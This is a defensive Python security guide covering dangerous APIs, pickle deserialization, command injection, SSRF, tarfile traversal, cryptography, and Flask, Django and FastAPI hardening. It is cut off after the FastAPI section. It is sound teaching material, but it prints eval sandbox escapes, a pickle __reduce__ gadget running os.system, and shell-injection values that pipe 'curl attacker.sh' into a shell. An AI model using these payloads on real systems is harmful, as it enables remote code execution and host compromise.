Comprehensive Python Security Guide
🆕 Enhanced May 2, 2026 - Updated with 8 critical CVEs including AI/ML framework vulnerabilities (Ollama, Hugging Face), supply chain security patterns, and Python 3.15 security features from automated 2026 threat intelligence analysis.
A practitioner’s defensive reference for securing Python applications — dangerous APIs, deserialization pitfalls, framework-specific risks, supply chain attacks, AI/ML security threats, 2026 CVEs, advanced static analysis, and hardening patterns. Enhanced with cutting-edge threat intelligence and defensive techniques.
Table of Contents
- Fundamentals
- Dangerous Built-in APIs
- Insecure Deserialization
- Command & Code Injection
- SSRF & URL Parsing in Python
- Path Traversal, Tarfile, Zipfile
- Cryptography & Randomness
- Flask Security
- Django Security
- FastAPI & Other Frameworks
- Jinja2 & Server-Side Template Injection
- Package Supply Chain Attacks
- LLM / AI Framework CVEs
- ML Model Deserialization Attacks
- Notable Python CVEs (Stdlib)
- Static Analysis & SAST
- Secure Coding Patterns
- Hardening Checklist
- Tool Reference
- Detection Quick Reference
1. Fundamentals
Python’s dynamism is both its selling point and its largest security footgun. Classes can be instantiated from strings, modules can be imported at runtime, objects can rewrite their own deserialization hooks, and the default serializer is Turing-complete. A defender cannot rely on the language to fail safe — every dangerous capability is a first-class primitive.
The Python attack surface stack:
| Layer | Typical bugs |
|---|---|
| Language primitives | eval, exec, compile, __reduce__, __import__, f-string format injection |
| Stdlib | pickle, tarfile, zipfile, subprocess, urllib.parse, xml.etree, plistlib |
| Third-party libs | PyYAML load(), Jinja2 SSTI, requests proxy/SSL flaws, urllib3 CRLF |
| Frameworks | Flask debug PIN, Django PickleSerializer, FastAPI Pydantic misuse, SSTI in Jinja templates |
| AI/ML stack | PyTorch torch.load, Hydra instantiate(), PickleScan bypasses, LangChain/LiteLLM/Langflow RCE |
| Supply chain | PyPI typosquatting, compromised maintainer accounts, .pth startup hooks, poisoned CI/CD |
Three classes of Python-specific RCE:
| Class | Trigger | Example |
|---|---|---|
| Eval-class | User input reaches eval/exec/compile | Langflow /api/v1/validate/code decorator parsing |
| Deserialization-class | Untrusted bytes reach pickle.loads/yaml.load/torch.load | __reduce__ gadget running os.system |
| Supply-chain-class | Malicious code installed via package manager | litellm 1.82.7/1.82.8, chimera-sandbox-extensions, telnyx 4.87.1/4.87.2 |
Impact spectrum: Information disclosure → File read/write → Credential theft → Remote code execution → Cloud account takeover → Full host/CI/CD compromise.
2. Dangerous Built-in APIs
The following built-ins should be treated as unsafe sinks wherever they meet untrusted data. Bandit, Semgrep, CodeQL, and every commercial SAST ships rules for all of them. They are not bugs in Python — they are features explicitly documented as unsafe — but their one-liner ergonomics make them attractive shortcuts that age into long-lived vulnerabilities.
eval / exec / compile
eval(s) parses and evaluates a Python expression. exec(s) runs a statement or module. compile(s, ...) turns source into a code object that can later be handed to exec. All three will happily execute anything reachable through builtins:
__import__('os').system('id')
(lambda: __import__('subprocess').check_output(['id']))()
Even “restricted” eval patterns (empty globals, {'__builtins__': None}) are routinely bypassed through attribute chains on literal types ((42).__class__.__mro__[-1].__subclasses__()) or comprehension scope tricks.
Mitigations:
- For literal data: use ast.literal_eval (only literals, no calls and no general arithmetic).
- For expression languages: use simpleeval or a purpose-built parser.
- For dispatch: look up the handler in a dict; never build a string and eval it.
- For config: JSON, TOML, or safe_load YAML; never exec(config_string).
Real-world example: Langflow CVE-2025-3248 / CVE-2026-33017. Langflow accepted user-submitted Python code through /api/v1/validate/code (CVSS 9.8, no auth required) and passed it through ast.parse(), compile(), and exec(). Because Python evaluates decorator expressions (and default argument values) when the def statement itself executes, an attacker embedded the payload inside a @decorator expression: execution occurred as soon as the function was defined, before any function body ran, bypassing validation that looked only at function contents. Added to CISA KEV on May 5, 2025, with confirmed active exploitation. The second CVE (CVE-2026-33017) exposed the same pattern through /api/v1/build_public_tmp/{flow_id}/flow, where attacker-controlled POST data was passed directly to exec() without sandboxing, affecting all Langflow versions through 1.8.2 (fixed in 1.9.0). Added to CISA KEV within days of disclosure, confirming rapid attacker adoption of Python code-injection CVEs in AI frameworks.
ast.literal_eval
Safe for JSON-like literals but still susceptible to DoS — it can be pushed into memory/CPU exhaustion with deeply nested or oversized literals. In ml-flextok (Apple/EPFL), ast.literal_eval was used to decode model metadata; the library was later rewritten to use YAML with an allow list.
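One way to limit the DoS exposure described above is to cap the input size before parsing and to treat every parser failure as a rejection. The sketch below is only an illustration: the name parse_literal and the 10,000-character budget are assumptions, not values from any library.

```python
import ast

# Assumed budget for this sketch; tune it to the largest literal you expect.
MAX_LITERAL_CHARS = 10_000


def parse_literal(text: str, max_chars: int = MAX_LITERAL_CHARS):
    """Parse a Python literal, rejecting oversized input before it is parsed."""
    if len(text) > max_chars:
        raise ValueError("literal too large")
    try:
        return ast.literal_eval(text)
    except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError) as exc:
        # literal_eval reports malformed or too-deeply-nested input with these types.
        raise ValueError("not a valid literal") from exc
```

A length cap does not bound nesting depth on its own, so this narrows the problem rather than removing it; untrusted metadata is still better carried in JSON.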
__import__ / importlib
__import__(attacker_string) or importlib.import_module(attacker_string) loads and executes arbitrary module code as a side effect of import. Any caller doing importlib.import_module(request.args['module']) is trivially RCE.
Format string injection (f-string & str.format)
'{0.__init__.__globals__[os].system}'.format(obj)
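str.format exposes arbitrary attribute and index traversal when the format string itself comes from user input. f-strings are compiled from source, so they are exposed only when the source text is attacker-controlled, which is the eval case above. Treat user-controlled format strings as code.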
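If user-supplied format strings cannot be avoided, one option is a string.Formatter subclass that accepts plain {name} fields and refuses attribute or index access. FlatFormatter and render_user_template are hypothetical names for this sketch; string.Template is a simpler alternative when only substitution is needed.

```python
import string


class FlatFormatter(string.Formatter):
    """Formatter that allows plain {name} fields but no attribute or index access."""

    def get_field(self, field_name, args, kwargs):
        # "{0.__init__}" and "{cfg[SECRET]}" both reach this hook with the full field name.
        if "." in field_name or "[" in field_name:
            raise ValueError(f"attribute/index access not allowed: {field_name!r}")
        return super().get_field(field_name, args, kwargs)


def render_user_template(template: str, **values: str) -> str:
    """Render a user-chosen template against caller-chosen values only."""
    return FlatFormatter().format(template, **values)
```

Passing only strings as values keeps conversion flags such as !r harmless, since there is no rich object to introspect.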
pty / os.exec* / os.spawn*
Direct process execution. Always prefer subprocess with argument lists.
input() in Python 2
Worth mentioning only to bury: Python 2’s input() was eval(raw_input()). Every Python 2 codebase still in production is a latent RCE if any input() remained.
Application-level sandboxing is insufficient
Removing __builtins__ from the exec namespace is a common but fundamentally broken mitigation. An attacker can walk up the class tree from any literal to recover builtins:
lookup = lambda n: [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == n][0]
From there, Codec().decode('') triggers an exception whose traceback frame exposes __builtins__ again. The same class-tree walk (''.__class__.__mro__[-1].__subclasses__()) powers SSTI escapes, eval jail breaks, and CTF sandbox bypasses. Application-level Python sandboxes (removing imports, restricting builtins) have been broken so many times that the CPython project refuses to support them as a security boundary.
If you must run untrusted Python: use OS-level isolation — separate process with seccomp + setrlimit, Firecracker microVMs, gVisor containers, or managed sandboxes (Lambda, Fly Machines). Never rely on Python-level restrictions alone.
pickle, marshal, shelve (covered in §3)
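Listed here as built-ins for completeness. pickle and shelve execute code on load; marshal can deserialize code objects and is not hardened against malicious input. The marshal format is also deliberately undocumented and can change between Python versions, so it should never be used on external data even if it weren’t unsafe.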
Reflection primitives
getattr, setattr, hasattr, vars, globals, locals, __import__ become dangerous when the attribute name comes from untrusted input. Patterns like getattr(module, request.args['method'])() are common in “generic” dispatchers and are the same RCE as eval with extra steps. Use an explicit allow list dict.
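The allow list dict mentioned above can be as small as the following sketch. The handler names (export_csv, export_count) are made up for illustration; the point is that the untrusted string is only ever used as a dictionary key.

```python
def export_csv(rows):
    """Render rows as comma-separated lines."""
    return "\n".join(",".join(map(str, row)) for row in rows)


def export_count(rows):
    """Return the number of rows as text."""
    return str(len(rows))


# Explicit allow list: the only callables a request can ever reach.
HANDLERS = {
    "csv": export_csv,
    "count": export_count,
}


def dispatch(method: str, rows):
    """Look the method up in the allow list instead of using getattr or eval."""
    try:
        handler = HANDLERS[method]
    except KeyError:
        raise ValueError(f"unknown method: {method!r}") from None
    return handler(rows)
```

Because the lookup never touches module attributes, names such as __class__ or system simply fail as unknown keys.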
3. Insecure Deserialization
The highest-severity class of Python vulnerability. The official pickle docs carry the warning verbatim: “The pickle module is not secure. Only unpickle data you trust.”
Why pickle is dangerous
Pickle is a stack-based VM. Any object can customize its own reconstruction via __reduce__, which returns a (callable, args) tuple that pickle will execute during load. The canonical attacker payload looks like this (analyzed, not augmented):
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ("id",))
pickle.dumps(Exploit()) produces a few dozen bytes that, when unpickled anywhere, run os.system("id"). The Semgrep walkthrough demonstrates the full flow: Flask endpoint → request.data → pickle.load(io.BytesIO(raw_data)) → code execution.
Sink inventory
| Library | Dangerous call | Notes |
|---|---|---|
| pickle | load, loads, Unpickler.load | Core primitive |
| _pickle / cPickle | same | C implementation, identical behavior |
| dill | load, loads | Serializes more object types than pickle |
| shelve | open, Shelf[...] | Thin wrapper over pickle on disk |
| jsonpickle | decode | Uses JSON transport but still reconstructs arbitrary Python objects |
| PyYAML | yaml.load() (unsafe loader) | 5.1+ warns when Loader is omitted and 6.0 requires it (CVE-2017-18342); prefer yaml.safe_load |
| NumPy | numpy.load(..., allow_pickle=True) | Default changed to False, but legacy code often still passes True |
| PyTorch | torch.load(...) without weights_only=True | Loads pickled module state |
| scikit-learn | joblib.load, pickle.load | Model persistence |
| pandas | pandas.read_pickle | Same pickle VM |
| PLY (ply.yacc) | yacc(picklefile=...) | CVE-2025-56005: undocumented parameter in PyPI 3.11 silently passes attacker-controlled path to pickle.load. Executes before any parsing logic runs, bypassing runtime monitoring. High risk in CI/CD pipelines, shared filesystems, and cached parser table directories |
Bypasses against pickle scanners
Scanners like picklescan try to block known-dangerous callables with a blacklist. Four 2025 advisories show the approach is brittle:
- CVE-2025-1716: Using pip.main as the __reduce__ callable evades blacklists because pip is a legitimate import. The payload calls pip.main(["install", "malicious-package"]), silently installing an attacker-controlled PyPI package whose setup.py runs os.system("curl attacker.sh | bash"). Execution is silent with minimal logging. This turns a single pickle load into a two-stage RCE: pickle → pip → setup.py → arbitrary code.
- CVE-2025-10155: File extension trick. Renaming a .pkl to .bin or .pt makes PickleScan route the file to PyTorch-specific parsing, then mismatch and skip scanning, but PyTorch still loads it.
- CVE-2025-10156: CRC differential. PickleScan uses Python’s zipfile, which throws on CRC errors; PyTorch silently accepts them. Zeroing CRCs in a PyTorch archive hides the payload from the scanner.
- CVE-2025-10157: Subclass substitution. Instead of importing os.system directly, the payload uses a subclass in asyncio internals that resolves to the same callable, getting “Suspicious” instead of “Dangerous.”
Defense: Allow lists (not block lists), content-type inspection on actual bytes, and prefer safetensors for weights. If using PickleScan, update to at least version 0.0.31 (patches all four CVEs). Do not rely on a single scanning tool — layer defenses with format validation, hash verification, and sandboxed loading.
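The allow list approach can be sketched with the find_class hook that pickle.Unpickler exposes for restricting globals. The contents of ALLOWED_GLOBALS below are a hypothetical example; a real list should contain only the types your own data needs.

```python
import io
import pickle

# Hypothetical allow list: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class AllowListUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not named in ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    """Drop-in for pickle.loads that enforces the allow list."""
    return AllowListUnpickler(io.BytesIO(data)).load()
```

Plain containers, strings, and numbers never go through find_class, so they load unchanged, while a __reduce__ payload that references os.system or eval is rejected before the callable is resolved.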
Safer alternatives
| Need | Use |
|---|---|
| Data interchange | json (never executes code) |
| Config files | tomllib (3.11+), yaml.safe_load |
| Model weights | safetensors |
| Python object round-trip across trusted boundary | pickle with HMAC signature you control |
| Cross-language structured | Protocol Buffers, MessagePack |
Defensive pattern — signed pickle envelope
When you genuinely need object round-trip and control both ends:
import hmac, hashlib, pickle

def sign(data: bytes, key: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest() + data

def verify_and_load(blob: bytes, key: bytes):
    tag, data = blob[:32], blob[32:]
    if not hmac.compare_digest(tag, hmac.new(key, data, hashlib.sha256).digest()):
        raise ValueError("tampered")
    return pickle.loads(data)  # safe because we verified origin
Even this must never be used with a key shared with attackers, and pickle.loads itself remains a liability if keys leak.
4. Command & Code Injection
subprocess pitfalls
# DANGEROUS: shell=True with interpolation
subprocess.run(f"convert {user_file} out.png", shell=True)
An attacker supplies a.png; curl attacker.sh | sh and both commands run. The safe form is an argument list with no shell:
subprocess.run(["convert", user_file, "out.png"], check=True)
Even with a list, watch for:
- Filename starts with -: treated as a flag. Pass -- or validate paths to start with ./.
- shlex.split(user_input): still interprets quoting; don’t let users choose the argv.
- subprocess.Popen(..., executable='/bin/sh'): overrides the “no shell” benefit of a list.
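The "./" prefix advice can be sketched as a small helper that turns an untrusted name into a relative path which cannot be parsed as an option. as_file_operand and build_convert_argv are hypothetical names, and the sketch assumes POSIX path separators.

```python
import os


def as_file_operand(user_name: str) -> str:
    """Return user_name as a relative path that cannot be mistaken for a flag."""
    if not user_name or "\x00" in user_name:
        raise ValueError("empty or NUL-containing filename")
    if os.path.isabs(user_name) or ".." in user_name.split("/"):
        raise ValueError("absolute paths and '..' segments are rejected")
    # "-rf" becomes "./-rf", which option parsers treat as a file name.
    return os.path.join(".", os.path.normpath(user_name))


def build_convert_argv(user_file: str) -> list[str]:
    """Build an argv list; shell metacharacters stay inside one argument."""
    return ["convert", as_file_operand(user_file), "out.png"]
```

The resulting list is meant to be passed to subprocess.run without shell=True, so a value like "a.png; curl attacker.sh | sh" remains a single, oddly named file operand.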
os.system, os.popen, commands.*
All invoke a shell. Flag as unconditional Bandit B605/B607 hits.
Command injection via interpreters
Any tool that wraps git, ffmpeg, convert, pandoc, tar, ssh, curl has an injection surface even with argv lists — if the argv itself flows from user input, an attacker can supply --upload-pack, -o ProxyCommand=..., --reference etc. Real MLflow RCEs stemmed from unsanitized input reaching os.system inside a predict function.
venv CLI — CVE-2024-9287
CPython’s venv did not quote path names when writing activate scripts. If a virtualenv was created at an attacker-controlled path, activating it ran arbitrary shell commands. The lesson generalizes: any code generator that emits shell, SQL, or HTML must quote its output — it is not the consumer’s job to sanitize generated code.
shlex pitfalls
shlex.split(user_input) parses POSIX shell syntax including quoting, so an attacker can pass "a b" "c d" to produce two tokens instead of four. Fine when you expect shell-style input; disastrous when you expected filenames.
subprocess environment and cwd
subprocess.run(..., env=None) inherits the caller’s full environment. Leaking AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, etc. into a child that logs or transmits them is a common subtle exfiltration path. Pass an explicit env={...} with just what the child needs, and consider cwd= too — relative paths have burned many teams.
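A minimal sketch of the explicit-environment pattern follows. The helper name run_minimal_env is an assumption, and forwarding only PATH is a starting point for POSIX systems; Windows children typically also need variables such as SYSTEMROOT.

```python
import os
import subprocess


def run_minimal_env(argv, extra_env=None, cwd=None):
    """Run argv with an explicit environment instead of inheriting the caller's."""
    # Start from PATH only; secrets in os.environ are not forwarded.
    env = {"PATH": os.environ.get("PATH", os.defpath)}
    if extra_env:
        env.update(extra_env)
    return subprocess.run(
        argv,
        env=env,
        cwd=cwd,
        check=True,
        capture_output=True,
        text=True,
    )
```

Anything the child legitimately needs is passed through extra_env, which makes each forwarded variable a visible decision in code review.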
Command injection in template-based tools
Tools like cookiecutter, jinja2-cli, or custom code generators that render shell scripts from user input inherit every injection flaw of the target shell. Treat rendered shell the same as rendered SQL: parameterize or escape, never concatenate.
5. SSRF & URL Parsing in Python
Python shares the cross-language SSRF surface (see the SSRF guide) plus several language-specific bugs.
Sink functions
requests.get/post/... (follows redirects by default)
urllib.request.urlopen (also opens file:// and ftp:// URLs by default)
urllib3.PoolManager.request
httpx.get/AsyncClient
aiohttp.ClientSession.get
http.client.HTTPConnection
Python-specific bugs
- CVE-2024-11168: urllib.parse.urlsplit/urlparse accepted bracketed hosts that were not IPv6 or IPvFuture. Parser differential with other URL libraries allowed SSRF when one parser validated and another fetched.
- CVE-2025-0938: related square-bracket parsing bug; same differential class.
- CVE-2023-24329: urllib.parse allowed URLs starting with whitespace or control characters to bypass scheme blocklists.
- CVE-2019-9740 & friends: urllib3 CRLF injection in HTTP headers when the URL or method contained newlines.
- CVE-2023-32681: requests leaked Proxy-Authorization headers across redirects.
- CVE-2024-35195: requests Session silently kept verify=False for a host after a single unverified call.
Defensive hooks
# Block private ranges before making the call
import ipaddress, socket

def is_public(host: str) -> bool:
    for family, _, _, _, sockaddr in socket.getaddrinfo(host, None):
        ip = ipaddress.ip_address(sockaddr[0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
Always pair with a post-resolution check (Python resolves DNS separately from the HTTP call, so DNS rebinding is a real threat). Prefer a dedicated egress proxy that enforces the allow list outside the process.
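One way to narrow the rebinding window is to resolve once, validate every answer, and hand the validated addresses to the code that opens the connection, so the HTTP client never performs a second lookup. The sketch below assumes a hypothetical helper name and uses ipaddress.is_global, which also rejects shared address space such as 100.64.0.0/10 that is_private does not cover.

```python
import ipaddress
import socket


def resolve_public_addresses(host: str, port: int = 443) -> list[str]:
    """Resolve host once and return its addresses only if all of them are public."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    addresses = []
    for _family, _type, _proto, _canon, sockaddr in infos:
        ip = ipaddress.ip_address(sockaddr[0])
        # is_global is False for private, loopback, link-local, and shared ranges.
        if not ip.is_global or ip.is_multicast:
            raise ValueError(f"{host} resolves to non-public address {ip}")
        addresses.append(str(ip))
    return addresses
```

The caller then connects to one of the returned IPs directly (keeping the original hostname for the Host header and TLS verification), which is how the check and the fetch end up using the same resolution.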
6. Path Traversal, Tarfile, Zipfile
tarfile — a 15-year saga
CVE-2007-4559 — tarfile.extractall() did not validate member names, so entries like ../../../etc/passwd wrote outside the target. Unfixed for 15 years; in 2022 a rediscovery showed hundreds of thousands of repos still vulnerable.
Python 3.12 introduced extraction filters (filter="data", filter="tar"), but then came:
- CVE-2025-4517 (CVSS 9.4): filter="data" still allowed arbitrary filesystem writes outside the target directory.
- CVE-2025-4138 / CVE-2025-4330: symlink extraction bypassed the filter.
- CVE-2024-12718: filter="data" still let attackers modify metadata of files outside the directory.
- CVE-2025-8194: negative offset in tar header caused infinite loop DoS.
- CVE-2024-6232: ReDoS in tar header parsing.
Safe pattern:
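import os
import tarfile

def safe_extract(tar: tarfile.TarFile, path: str) -> None:
    base = os.path.realpath(path)
    for m in tar.getmembers():
        # Every member must resolve to a path strictly inside the target directory.
        target = os.path.realpath(os.path.join(base, m.name))
        if not target.startswith(base + os.sep):
            raise RuntimeError(f"path traversal: {m.name}")
        # Reject symlinks and hard links outright; they can redirect later writes.
        if m.issym() or m.islnk():
            raise RuntimeError(f"link not allowed: {m.name}")
    tar.extractall(path)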
zipfile — CVE-2025-8291
zipfile trusted the ZIP64 EOCD locator offset without validation, creating a parser differential with other ZIP implementations (interesting for bypassing scanners that use the “correct” parser). Fixed to validate offset alignment.
plistlib — CVE-2025-13837
OOM DoS: the module read sizes from the file itself without a cap; a hostile plist could demand gigabytes.
xml.etree / lxml
XXE and billion-laughs apply. The billion-laughs attack uses recursive entity expansion to consume gigabytes of RAM from a tiny XML file — defusedxml blocks this by default. defusedxml is the drop-in replacement for all stdlib XML parsers — covers xml.etree.ElementTree, xml.dom.minidom, xml.sax, and lxml.etree. Without it, any parser that resolves external entities can be turned into an SSRF + file read primitive. Note that xml.dom.minidom has its own DoS vector: CVE-2025-12084 — quadratic complexity in appendChild() when building nested documents, causing availability impact without external entities.
pickle files masquerading as archives
Attackers frequently ship malicious pickle inside a .zip, .tar, or .nemo wrapper. Extraction libraries may stream the inner pickle to pickle.load() or torch.load() without re-validating. Always inspect the inner bytes against your allow list after decompression, not before.
7. Cryptography & Randomness
| Wrong | Right |
|---|---|
| random.random() for tokens | secrets.token_urlsafe(32) |
| hashlib.md5/sha1 for password hashing | argon2-cffi, bcrypt, hashlib.scrypt |
| DIY AES in ECB | cryptography.fernet.Fernet |
| ssl.PROTOCOL_TLSv1 | ssl.create_default_context() |
| verify=False on requests | CA bundle + cert pinning |
| Hand-rolled JWT | pyjwt with algorithms=["HS256"] explicit |
| Comparing secrets with == | hmac.compare_digest |
Django-specific good pattern — encrypting user-supplied API keys at rest with cryptography.Fernet, key from env via django-environ, never committed. Model helper methods wrap encrypt/decrypt so the raw ciphertext never leaks through the ORM.
Why random is dangerous for security
random is a Mersenne Twister (MT19937) whose internal state is 624 32-bit words. Given 624 consecutive 32-bit outputs, the full state is recoverable; after that, every future output is predictable. Attackers have used this to forge session tokens, reset codes, and CSRF tokens. The fix is trivial: import secrets; secrets.token_urlsafe(32).
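As a small illustration of the fix, the sketch below issues a token from the OS CSPRNG and checks a presented value in constant time. The function names are hypothetical; only secrets.token_urlsafe and hmac.compare_digest come from the standard library.

```python
import hmac
import secrets


def new_session_token() -> str:
    """Return an unpredictable URL-safe token backed by the OS CSPRNG."""
    return secrets.token_urlsafe(32)  # 32 random bytes, base64url-encoded


def token_matches(presented: str, expected: str) -> bool:
    """Compare tokens without leaking the position of the first mismatch."""
    return hmac.compare_digest(presented.encode(), expected.encode())
```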
JWT pitfalls
- Algorithm confusion: if your verifier accepts any algorithm in the token header, an attacker switches to none or re-signs an RS256 token as HS256 using the public key as the HMAC secret.
- Key rotation: put kid in the header and bind each kid to an allowed algorithm.
- Expiration: always validate exp and require the claim to be present; some libraries (PyJWT, for example) check exp only when the token carries one unless you opt in to requiring it.
- Audience/issuer: validate aud and iss, otherwise tokens from one service can be replayed against another.
Password hashing
Do not use hashlib.sha256 with or without salt. Use Argon2id (argon2-cffi) with memory cost tuned to your hardware, or bcrypt with a work factor ≥ 12. Hash length and verification timing must be constant; hmac.compare_digest is the primitive.
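Where installing argon2-cffi or bcrypt is not an option, a stdlib-only sketch with hashlib.scrypt (listed in the table above) looks roughly like this. The cost parameters are commonly cited interactive-login values and are an assumption here, not a recommendation from the source; tune them to your hardware.

```python
import hashlib
import hmac
import os

# Assumed cost parameters (about 16 MiB of memory per hash).
SCRYPT_PARAMS = {"n": 2**14, "r": 8, "p": 1, "dklen": 32}


def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest) for storage; the salt is random per password."""
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute the digest and compare it in constant time."""
    candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt, **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, expected)
```

Storing the parameters alongside the salt and digest makes it possible to raise the cost later and rehash on the next successful login.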
8. Flask Security
Debug mode & the Werkzeug PIN
app.run(debug=True) in production is a pre-auth RCE. The Werkzeug debugger’s PIN is derived from predictable machine info (/etc/machine-id, username, uid, mac, path to app.py). With a /proc read or local file read bug, an attacker computes the PIN and gets an interactive shell at /console.
Never ship debug=True. Pin via FLASK_DEBUG=0 and Werkzeug env var checks in production entrypoints.
Common Flask sinks
# SSTI
return render_template_string("Hello " + request.args["name"])
# pickle session
app.session_interface = PickleSessionInterface()  # don't
# open redirect
return redirect(request.args["next"])
# pickle in endpoint
return pickle.loads(request.data)  # Semgrep will scream
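For the open redirect sink, one conservative approach is to accept only same-site absolute paths and fall back to a fixed page otherwise. The helper below is a sketch with a hypothetical name; it uses only urllib.parse and deliberately rejects more than it strictly has to.

```python
from urllib.parse import urlsplit


def is_safe_redirect_target(target: str) -> bool:
    """Accept only local absolute paths such as "/dashboard?tab=1"."""
    if not target or not target.startswith("/"):
        return False
    # "//host" and "/\host" are treated as protocol-relative URLs by browsers.
    if target.startswith("//") or "\\" in target:
        return False
    # Control characters can be stripped by browsers, changing how the URL parses.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""
```

In a Flask view this would gate the next parameter, redirecting to a known default whenever the check fails.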
Secure cookie setup
from datetime import timedelta

app.config.update(
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True,
    SESSION_COOKIE_SAMESITE="Lax",
    PERMANENT_SESSION_LIFETIME=timedelta(hours=2),
)
Always rotate SECRET_KEY and store in a secret manager — a leaked Flask SECRET_KEY lets attackers mint signed session cookies.
9. Django Security
Django’s built-in defenses are strong when left on. The bugs come from turning them off.
Bugs by disabling defaults
| Setting | Risk when changed |
|---|---|
| DEBUG = True | Full traceback + settings exposure via 500 page |
| ALLOWED_HOSTS = ["*"] | Host header poisoning, password-reset link spoofing |
| Turning off CsrfViewMiddleware | CSRF on every POST |
| SECURE_SSL_REDIRECT = False | Downgrade + cookie theft |
| X_FRAME_OPTIONS = "ALLOW" | Clickjacking |
| Custom PickleSerializer (deprecated 4.1+, acknowledging pickle as inherently unsafe) | RCE via cookie forgery if SECRET_KEY leaks |
| AUTH_PASSWORD_VALIDATORS = [] | Weak-password acceptance |
ORM injection
Safe: User.objects.filter(email=user_input). Unsafe: .extra(where=[f"email = '{user_input}'"]) and .raw(f"... {user_input}"). extra() is effectively a footgun; RawSQL at least forces params.
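The difference between interpolated and parameterized SQL can be shown with the standard-library sqlite3 driver; Django’s raw() and RawSQL accept a params argument that serves the same purpose. The table and function names below are hypothetical.

```python
import sqlite3


def find_user_ids(conn: sqlite3.Connection, email: str) -> list[int]:
    """Look up users by email with a bound parameter, never string formatting."""
    # The driver sends `email` as data, so quotes in it cannot change the query.
    rows = conn.execute("SELECT id FROM users WHERE email = ?", (email,)).fetchall()
    return [row[0] for row in rows]


def make_demo_db() -> sqlite3.Connection:
    """Build a throwaway in-memory database for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    conn.executemany(
        "INSERT INTO users (email) VALUES (?)",
        [("a@example.com",), ("b@example.com",)],
    )
    return conn
```

With the f-string form, the input ' OR '1'='1 would match every row; with the bound parameter it is compared as a literal email address and matches nothing.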
Template auto-escape
{{ var }} is auto-escaped. {{ var|safe }} and mark_safe() switch it off — every use is a code review red flag. {% autoescape off %} blocks disable escaping wholesale.
Secrets & keys
Never commit SECRET_KEY. Store encryption keys in env / secret manager. The photondesigner walkthrough pattern: Fernet.generate_key(), save in .env, gitignore the .env, encrypt user API keys on save, decrypt on use.
PyGoat labs — OWASP Top 10 in Django
A useful hands-on range covering broken access control, insecure deserialization (YAML load on uploaded file), XSS via URL param into anchor, lack of rate limiting on OTP, SSRF via avatar fetch, and OAuth misconfigurations.
Django admin hardening
- Change the default /admin/ URL prefix.
- Require MFA for staff accounts (django-otp, django-mfa2).
- Log admin actions to a tamper-resistant sink.
- Keep SESSION_COOKIE_AGE short for sites that serve the admin (Django has no separate admin-only session lifetime setting).
- Never expose admin to the public internet without an auth proxy.
- Keep SILENCED_SYSTEM_CHECKS = [] so that security warnings are never silenced.
Signed cookies and SECRET_KEY
Django’s session, CSRF, password-reset, and signed-cookie framework all derive from SECRET_KEY. A leaked key lets an attacker forge any signed artifact, including admin session cookies. Rotate on leak, never bake into Docker images, store in a secret manager.
File upload hardening
- Validate extensions and content type and magic bytes.
- Store uploaded files outside the webroot or behind a signed-URL proxy.
- Never trust Content-Type from the client.
- For image uploads, re-encode via Pillow to strip EXIF and malformed headers.
- Apply antivirus scanning (ClamAV) for any publicly accessible upload.
10. FastAPI & Other Frameworks
FastAPI’s Pydantic validation eliminates a large class of type-confusion bugs but does not protect against:
- Mass assignment when you pass **model.dict() (model_dump() in Pydantic v2) straight into an ORM create.
- Response model leakage: forgetting response_model= means the raw DB object (including password hashes) is serialized.
- JWT “none” algorithm: always pin algorithms=[...] on decode.
- Background tasks running user input through subprocess.
- WebSocket endpoints without origin check: vulnerable to cross-site WebSocket hijacking.
Pyramid / Tornado / Bottle carry the same injection and deserialization risks. Tornado’s autoreload debug mode is as dangerous as Flask’s debugger.
FastAPI-specific patterns
from fastapi import FastAPI, Depends
from pydantic import BaseModel, ConfigDict

class UserIn(BaseModel):
    model_config = ConfigDict(extra="forbid")  # reject unknown fields
    email: str
    password: str

class UserOut(BaseModel):
    id: int
    email: str  # no password, no hash

app = FastAPI()

@app.post("/users", response_model=UserOut)
async def create(user: UserIn):
    ...
Key points: strict Pydantic models in both directions, response_model to avoid leaking internal fields, dependency injection for auth (Depends(get_current_user)), and never trust model.dict() to be safe for SQL construction.
WebSockets
Origin header is the only cross-site defense for WebSockets. FastAPI / Starlette / aiohttp WebSocket endpoints must validate websocket.headers.get("origin") against an allow list — otherwise cross-site WebSocket hijacking reads authenticated sessions.
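The origin check itself is framework-independent and can be sketched as a pure function that a WebSocket handler calls before accepting the connection. ALLOWED_ORIGINS and origin_allowed are hypothetical names, and the single allowed origin is a placeholder.

```python
from urllib.parse import urlsplit

# Placeholder allow list; replace with the origins your front end is served from.
ALLOWED_ORIGINS = frozenset({"https://app.example.com"})


def origin_allowed(origin_header, allowed=ALLOWED_ORIGINS) -> bool:
    """Return True only for an exact scheme://host[:port] match in the allow list."""
    if not origin_header:
        return False  # missing header: refuse rather than guess
    parts = urlsplit(origin_header)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False  # also rejects the literal "null" origin
    if parts.path or parts.query or parts.fragment:
        return False  # a real Origin header carries no path
    return f"{parts.scheme}://{parts.netloc}".lower() in allowed
```

Exact matching avoids the classic suffix mistake where https://app.example.com.evil.test passes a startswith or substring test.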
